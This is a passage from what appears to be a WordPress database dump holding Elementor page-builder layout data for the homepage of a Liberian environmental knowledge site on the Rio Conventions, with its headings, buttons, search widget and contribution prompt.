fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#014421\"},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#ffffff\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6102,551,'_elementor_version','2.7.5'),(6103,551,'_elementor_template_type','wp-page'),(6104,551,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6106,552,'_wp_page_template','default'),(6107,552,'_elementor_edit_mode','builder'),(6108,552,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6109,552,'_elementor_version','2.7.5'),(6110,552,'_elementor_template_type','wp-page'),(6111,552,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6113,553,'_wp_page_template','default'),(6114,553,'_elementor_edit_mode','builder'),(6115,553,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the 